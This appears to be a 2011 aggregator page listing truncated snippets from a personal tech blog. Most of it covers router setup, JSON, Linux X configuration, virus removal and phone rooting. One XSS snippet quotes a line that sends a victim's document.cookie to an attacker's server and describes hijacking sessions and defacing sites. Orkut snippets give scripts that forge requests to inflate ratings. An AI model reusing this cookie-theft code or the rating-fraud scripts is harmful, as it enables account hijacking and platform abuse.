03 Jan, 2011

Css visual designer web design server

Articles related to css visual designer web design server

Tata Indicom Wimax Broadband Connection sharing via Wireless router (D-Link)

http://digitalpbk.blogspot.com/2009/06/tata-indicom-wimax-connection-sharing.html Tata Indicom Wimax Broadband Connection sharing via Wireless router (D-Link) Intro: Tata Indicom Wimax BroadbandWe got a new Tata Indicom WiMax Broadband connection, and one of the first problems was sharing the net connection with the room mates. After doing a little research on it I found Tata Indicom uses a net (HTTP) based authenticating system to logon you onto their servers, against conventional setup of PPPoE. https://loginban.tataindicombroadband.in:8443Connection SharingIn order ...
Published 2 years, 11 months ago

JSON- Javascript Object Notation

http://digitalpbk.blogspot.com/2007/06/json-javascript-object-notation.html response, we have to use the following notation,Suppose we are returning an XML response from a server using Ajax. The common method to extract the useful information is :var xml = xmlHttp.responseXML;var list= xml.getElementsByTagName("TAG");for(i=0;i {// loop through and extract the values}This can be replaced with the new JSON object notation byvar strobj = xmlHttp.responseText;var obj = eval("("+strobj+")");obj.an_array[0];obj.a_multi_array[0][0];// ....The Notation ...
Published 4 years, 10 months ago

Xorg.conf File Settings for Beryl and Desktop-effects

http://digitalpbk.blogspot.com/2007/05/xorgconf-file-settings-for-beryl-and.html Xorg.conf File Settings for Beryl and Desktop-effects NoteThe following is my /etc/X11/xorg.conf file on which beryl and desktop-effects work.NVidia Graphics Card. If you are unable to enable the desktop-effects or beryl,try copy pasting the Module, Device and Screen Sections to your xorg.conf file.Please back up your existing xorg.conf file before changing anything.# Xorg configuration created by livna-config-displaySection "ServerLayout" Identifier "single head ...
Published 5 years ago

Increasing the karma ratings on Orkut

http://digitalpbk.blogspot.com/2007/01/increasing-karma-ratings-on-orkut.html , the 3 get requests must not be sent to the server together. Leave a time delay of about 100ms between each of the GET requests.You can accomplish this in javascript by the following this template: function fn(index){ var links=new Array("Link 1 for cool/trusty/sexy/fan", "etc fill in"); var i= new Image(); i.src = links[index]; if(index != Count) { window.setTimeout("fn("+(index+1)+")",100); } else window.location = "Somewhere"; //Redirect ...
Published 5 years, 3 months ago

XSS - Part 2 (Cookie stealing and Defacement)

http://digitalpbk.blogspot.com/2006/12/xss-part-2-cookie-stealing-and.html ();i.src = "http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;This code will send the cookies to your server. Now embeding the script in url can be done as discussed in part 1.Next all you have to do is get this cookie (from cookiejar.txt) and set them in your browser. You can add and edit cookies in firefox with the cookie editor plugin.Just a refresh will certainly get you in, if you are not too late (Cookie expires after sometime).Defacing a websiteTo deface a website , the site must have a system which puts something you submit on their site (like ...
Published 5 years, 5 months ago

Solved TV in Black and White Problem in Ubuntu 8.04 with Compaq Laptop

http://digitalpbk.blogspot.com/2008/06/ubuntu-compaq-presario-black-white-xorg.html .Xorg.conf# nvidia-xconfig: X configuration file generated by nvidia-xconfig# nvidia-xconfig: version 1.0 (buildmeister@builder26) Thu Feb 14 18:13:41 PST 2008# nvidia-settings: X configuration file generated by nvidia-settings# nvidia-settings: version 1.0 (buildd@yellow) Tue Mar 4 20:28:57 UTC 2008# xorg.conf (X.Org X Window System server configuration file)## This file was generated by dexconf, the Debian X Configuration tool, using# values from the debconf database.## Edit this file with caution ...
Published 3 years, 10 months ago

jwgkvsq.vmx - Conficker virus manual removal

http://digitalpbk.blogspot.com/2009/04/jwgkvsqvmx-conficker-virus-manual.html , this is the virus. A list of valid entries in the field (from Microsoft) is given below to help you find the random string. (Usually at the end).AppMgmtAudioSrvBrowserCryptSvcDMServerEventSystemHidServIasIpripIrmonLanmanServerLanmanWorkstationMessengerNetmanNlaNtmssvcNWCWorkstationNwsapagentRasautoRasmanRemoteaccessSacsvrScheduleSeclogonSENSSharedaccessThemesTrkWksTrkSvrW32TimeWZCSVCWmiWmdmPmSpwinmgmtwuauservBITSShellHWDetectionuploadmgrWmdmPmSNxmlprovAeLookupSvchelpsvcNote the random string. (in this case ...
Published 3 years, 1 month ago

How to make more fans on orkut?

http://digitalpbk.blogspot.com/2006/11/how-to-make-more-fans-on-orkut.html .Hope it works for you ...Happy OrkuttingFor advanced uses with knowledge in PHP and server accessYou guys can make a PHP script that takes a GET argument the id of your friend, and embend a img or script such that a GET request is made to the correct url. eg: http://www.yoursite.com/makefan.php?to=US1010101010makefan.php:if(isset($_GET["to"])){$to = $_GET["to"];}else {$to="US00000000";}?>function ld(){var img ...
Published 5 years, 6 months ago

Perl Download Manager

http://digitalpbk.blogspot.com/2008/06/perl-download-manager.html Perl Download Manager IntroThis is my PERL downloader program, with resume.Only works if SERVER has Parts enabled.Well pretty much thats it #!/usr/bin/perluse strict;use threads;use threads::shared;use HTTP::Request;use HTTP::Response;use Math::Round qw(nearest);use LWP;exit unless(defined $ARGV[0] && -e $ARGV[0]);open HND,$ARGV[0];NEXT:while(my $url = ){ my $file = substr($url,rindex($url,"/")+1); $file =~ s/%20/_/g; chomp $url; exit if($url eq "" || $file eq ...
Published 3 years, 11 months ago

How to easily unlock and root the Samsung Google Nexus S on Windows

http://digitalpbk.com/nexus-s/how-to-root-nexus-s-windows How to easily unlock and root the Samsung Google Nexus S on Windows or other important information using apps available from Android Market Contacts if synced to Google's servers would be synced back Make a list of applications and gadgets installed if you want to install them back. Procedure - Unlock your bootloader After backup, Shutdown your phone, (Let your friends know you are rooting just in case :D ). Press power button and choose Power off. Connect your phone to your laptop via the data cable. Press the Volume Up button and then the power button to turn ...
Published 6 months, 1 week ago

Related help topics for css visual designer web design server More keywords like css visual designer web design server
More pages for css visual designer web design server


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Makruzz Cruise Vessel Makruzz Cruise Vessel in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk